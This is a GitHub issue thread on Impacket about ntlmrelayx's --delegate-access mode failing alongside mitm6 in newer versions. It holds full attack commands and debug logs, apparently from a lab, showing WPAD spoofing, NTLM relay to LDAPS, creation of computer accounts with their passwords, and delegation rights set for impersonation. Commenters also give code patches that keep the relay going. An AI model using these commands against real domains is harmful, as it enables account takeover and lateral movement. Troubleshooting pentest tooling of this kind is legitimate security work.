### ISSUE TITLE
ntlmrelayx --delegate-access mitm6 error but  work on 9.19 version - "but there are no more targets left!"

### ISSUE THREAD

**Issue by T3KX** [SecureAuthCorp/impacket#914]
### Configuration  
impacket version:  Impacket v0.9.22.dev1+20200728.230151.48a3124c  and   9.21
Python version:  
Target OS:    10.0.17763 N/A Build 17763 , win7 and dc 2016 and 2019

### Debug Output With Command String  

# mitm6 -d domain.local --ignore-nofqnd -i eth0

ntlmrelayx.py -t ldaps://WIN-R7CPB7MAMCE.domain.local -wh fake-wpad --no-smb-server --delegate-access -debug

Impacket v0.9.22.dev1+20200728.230151.48a3124c - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket

[*] Protocol Client LDAP loaded..

[*] Protocol Client LDAPS loaded..//WIN-R7CPB7MAMCE.domain.local -wh pwnie --no-smb-server --

[*] Protocol Client MSSQL loaded..

[*] Protocol Client SMB loaded..

[*] Protocol Client SMTP loaded..

[*] Protocol Client RPC loaded..

[*] Protocol Client HTTP loaded..

[*] Protocol Client HTTPS loaded..

[*] Protocol Client IMAP loaded..

[*] Protocol Client IMAPS loaded..

[+] Protocol Attack LDAP loaded..

[+] Protocol Attack LDAPS loaded..

[+] Protocol Attack RPC loaded..

[+] Protocol Attack MSSQL loaded..

[+] Protocol Attack IMAP loaded..

[+] Protocol Attack IMAPS loaded..

[+] Protocol Attack HTTP loaded..

[+] Protocol Attack HTTPS loaded..

[+] Protocol Attack SMB loaded..

[*] Running in relay mode to single host

[*] Setting up HTTP Server

[*] Servers started, waiting for connections

[*] HTTPD: Received connection from 192.168.1.202, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: /wpad.dat

[*] HTTPD: Client requested path: /wpad.dat

[*] HTTPD: Serving PAC file to client 192.168.1.202

[*] HTTPD: Client requested path: /wpad.dat

[*] HTTPD: Serving PAC file to client 192.168.1.202

[*] HTTPD: Received connection from 192.168.1.200, but there are no more targets left!

-------------------------------

ntlmrelayx.py -t ldaps://WIN-R7CPB7MAMCE.domain.local -wh fake-wpad --no-smb-server --delegate-access -debug

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAP loaded..

[*] Protocol Client LDAPS loaded..

[*] Protocol Client MSSQL loaded..

[*] Protocol Client SMB loaded..

[*] Protocol Client SMTP loaded..

[*] Protocol Client HTTPS loaded..

[*] Protocol Client HTTP loaded..

[*] Protocol Client IMAPS loaded..

[*] Protocol Client IMAP loaded..

[+] Protocol Attack LDAP loaded..

[+] Protocol Attack LDAPS loaded..

[+] Protocol Attack MSSQL loaded..

[+] Protocol Attack IMAP loaded..

[+] Protocol Attack IMAPS loaded..

[+] Protocol Attack HTTP loaded..

[+] Protocol Attack HTTPS loaded..

[+] Protocol Attack SMB loaded..

[*] Running in relay mode to single host

[*] Setting up HTTP Server

[*] Servers started, waiting for connections

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: /wpad.dat

[*] HTTPD: Serving PAC file to client 192.168.1.200

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: http://ipv6.msftconnecttest.com/connecttest.txt

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: http://www.msftconnecttest.com/connecttest.txt

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: http://ipv6.msftconnecttest.com/connecttest.txt

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: http://www.msftconnecttest.com/connecttest.txt

[*] HTTPD: Client requested path: http://www.msftconnecttest.com/connecttest.txt

[*] HTTPD: Client requested path: http://ipv6.msftconnecttest.com/connecttest.txt

[*] Authenticating against ldaps://WIN-R7CPB7MAMCE.domain.local as domain\WIN10$ SUCCEED

[*] Enumerating relayed user's privileges. This may take a while on large domains

[*] Authenticating against ldaps://WIN-R7CPB7MAMCE.domain.local as domain\WIN10$ SUCCEED

[*] Enumerating relayed user's privileges. This may take a while on large domains

[+] User is a member of: []

[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=domain,DC=local - STATUS: Read - READ TIME: 2020-08-03T14:10:05.618604

    distinguishedName: CN=Domain Computers,CN=Users,DC=domain,DC=local

    name: Domain Computers

    objectSid: S-1-5-21-2360758874-3371830626-3945018863-515

]

[+] User is a member of: []

[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=domain,DC=local - STATUS: Read - READ TIME: 2020-08-03T14:10:05.670770

    distinguishedName: CN=Domain Computers,CN=Users,DC=domain,DC=local

    name: Domain Computers

    objectSid: S-1-5-21-2360758874-3371830626-3945018863-515

]

[+] New computer info {'servicePrincipalName': ['HOST/SFJUSUKR', u'HOST/SFJUSUKR.domain.local', 'RestrictedKrbHost/SFJUSUKR', u'RestrictedKrbHost/SFJUSUKR.domain.local'], 'userAccountControl': 4096, 'unicodePwd': '"\x00H\x000\x00^\x00j\x00u\x002\x00r\x00,\x00%\x00+\x00|\x00f\x00P\x00,\x00D\x00"\x00', 'dnsHostName': u'SFJUSUKR.domain.local', 'sAMAccountName': 'SFJUSUKR$'}

[*] Attempting to create computer in: CN=Computers,DC=domain,DC=local

[+] New computer info {'servicePrincipalName': ['HOST/NCNCTMSA', u'HOST/NCNCTMSA.domain.local', 'RestrictedKrbHost/NCNCTMSA', u'RestrictedKrbHost/NCNCTMSA.domain.local'], 'userAccountControl': 4096, 'unicodePwd': '"\x00q\x00.\x002\x00l\x00]\x00i\x00h\x00g\x00[\x005\x00)\x00S\x00;\x005\x00N\x00"\x00', 'dnsHostName': u'NCNCTMSA.domain.local', 'sAMAccountName': 'NCNCTMSA$'}

[*] Attempting to create computer in: CN=Computers,DC=domain,DC=local

[*] Adding new computer with username: SFJUSUKR$ and password: H0^ju2r,%+|fP,D result: OK

[+] Currently allowed sids:

[+]     S-1-5-21-2360758874-3371830626-3945018863-1110

[+]     S-1-5-21-2360758874-3371830626-3945018863-1109

[+]     S-1-5-21-2360758874-3371830626-3945018863-1111

[+]     S-1-5-21-2360758874-3371830626-3945018863-1112

[+]     S-1-5-21-2360758874-3371830626-3945018863-1113

[*] Delegation rights modified succesfully!

[*] SFJUSUKR$ can now impersonate users on WIN10$ via S4U2Proxy

[*] Adding new computer with username: NCNCTMSA$ and password: q. :) S;5N result: OK

[+] Currently allowed sids:

[+]     S-1-5-21-2360758874-3371830626-3945018863-1110

[+]     S-1-5-21-2360758874-3371830626-3945018863-1109

[+]     S-1-5-21-2360758874-3371830626-3945018863-1111

[+]     S-1-5-21-2360758874-3371830626-3945018863-1112

[+]     S-1-5-21-2360758874-3371830626-3945018863-1113

[+]     S-1-5-21-2360758874-3371830626-3945018863-1116

[*] Delegation rights modified succesfully!

[*] NCNCTMSA$ can now impersonate users on WIN10$ via S4U2Proxy

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: geo.prod.do.dsp.mp.microsoft.com:443

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: geo.prod.do.dsp.mp.microsoft.com:443

[*] HTTPD: Client requested path: geo.prod.do.dsp.mp.microsoft.com:443

[*] Authenticating against ldaps://WIN-R7CPB7MAMCE.domain.local as domain\WIN10$ SUCCEED

[*] Enumerating relayed user's privileges. This may take a while on large domains

[+] User is a member of: []

[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=domain,DC=local - STATUS: Read - READ TIME: 2020-08-03T14:10:10.141318

    distinguishedName: CN=Domain Computers,CN=Users,DC=domain,DC=local

    name: Domain Computers

    objectSid: S-1-5-21-2360758874-3371830626-3945018863-515

]

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: geover.prod.do.dsp.mp.microsoft.com:443

[*] Delegate attack already performed for this computer, skipping

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: geover.prod.do.dsp.mp.microsoft.com:443

[*] HTTPD: Client requested path: geover.prod.do.dsp.mp.microsoft.com:443

[*] Authenticating against ldaps://WIN-R7CPB7MAMCE.domain.local as domain\WIN10$ SUCCEED

[*] Enumerating relayed user's privileges. This may take a while on large domains

[+] User is a member of: []

[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=domain,DC=local - STATUS: Read - READ TIME: 2020-08-03T14:10:10.729834

    distinguishedName: CN=Domain Computers,CN=Users,DC=domain,DC=local

    name: Domain Computers

    objectSid: S-1-5-21-2360758874-3371830626-3945018863-515

]

[*] Delegate attack already performed for this computer, skipping

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: licensing.mp.microsoft.com:443

[*] HTTPD: Received connection from 192.168.1.200, attacking target ldaps://WIN-R7CPB7MAMCE.domain.local

[*] HTTPD: Client requested path: licensing.mp.microsoft.com:443

[*] HTTPD: Client requested path: licensing.mp.microsoft.com:443

[*] Authenticating against ldaps://WIN-R7CPB7MAMCE.domain.local as domain\WIN10$ SUCCEED

[*] Enumerating relayed user's privileges. This may take a while on large domains

[+] User is a member of: []

[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=domain,DC=local - STATUS: Read - READ TIME: 2020-08-03T14:10:24.165728

    distinguishedName: CN=Domain Computers,CN=Users,DC=domain,DC=local

    name: Domain Computers

    objectSid: S-1-5-21-2360758874-3371830626-3945018863-515

]

[*] Delegate attack already performed for this computer, skipping

---------------------------------------------------------------------

### Additional context  

I have been playing with mitm6 in conjunction with ntlmrelayx --delegate-access.  I found out that using Impacket v0.9.22.dev1+20200728.230151.48a3124c or 9.21 It doesn’t work. I always get “HTTPD: Received connection from 192.168.1.200, but there are no more targets left!” after dc reinstall, 2019 > 2016 , openssl tls1.2 > 1.0,  multiple ldaps enabling and other troubleshooting I found out that it looks like its Impacket version. It works very well with Impacket 9.19

**Comment by rev10d** [comment]
Found this comment searching for a similar bug. This worked for me (H/T @bhinfosec crew):

line #136 of the targetsutils.py file:
comment out self.generalCandidates.remove(target)

modify line #141 of the same file to the following: 
return self.generalCandidates[0]

instead of the previous .pop() directive

re-run the install.

**Comment by testanull** [comment]
> Found this comment searching for a similar bug. This worked for me (H/T @bhinfosec crew):
> 
> line # 136 of the targetsutils.py file:
> comment out self.generalCandidates.remove(target)
> 
> modify line # 141 of the same file to the following:
> return self.generalCandidates[0]
> 
> instead of the previous .pop() directive
> 
> re-run the install.

Work like a charm, thanks!

**Comment by Hackndo** [comment]
Yep, same issue here, this fixes it, but I don't know if it breaks anything else.

**Comment by 0xdeaddood** [comment]
Hi guys! Please git pull and re-test.

**Comment by Hackndo** [comment]
![image](https://user-images.githubusercontent.com/11051803/115107231-e22e4e00-9f69-11eb-85ff-25b9fa4ce19a.png)
Works like a charm on my end, thank you @0xdeaddood

**Comment by 0xdeaddood** [comment]
Thanks for the confirmation @Hackndo , closing.

**Comment by Aggelos11** [comment]
> Found this comment searching for a similar bug. This worked for me (H/T @bhinfosec crew):
> 
> line # 136 of the targetsutils.py file: comment out self.generalCandidates.remove(target)
> 
> modify line # 141 of the same file to the following: return self.generalCandidates[0]
> 
> instead of the previous .pop() directive
> 
> re-run the install.

Where is that file? i cant find that

**Comment by Aggelos11** [comment]
> self.generalCandidates.remove(target)

I found two of these. Which one must i delete ? the lines number is different from yours. 
for target in self.generalCandidates:
                    tmpTarget = '%s://%s@%s' % (target.scheme, identity.replace('/', '\\'), target.netloc + target.path)
                    match = [x for x in self.finishedAttacks if x.geturl().upper() == tmpTarget.upper()]
                    fail_match = [x for x in self.failedAttacks if x.geturl().upper() == tmpTarget.upper()]
                    print(self.failedAttacks)
                    if len(match) == 0 and len(fail_match) == 0:
                        self.generalCandidates.remove(target)
                        return target
                LOG.debug("No more targets for user %s" % identity)
                return None
            # Multirelay feature is disabled, general candidates are attacked just one time
            elif multiRelay == False:
                for target in self.generalCandidates:
                    match = [x for x in self.finishedAttacks if x.hostname == target.netloc]
                    if len(match) == 0:
                        self.generalCandidates.remove(target)
                        return target
                LOG.debug("No more targets")

**Comment by rev10d** [comment]
code has long since changed and improved.

try the --keep-relaying option
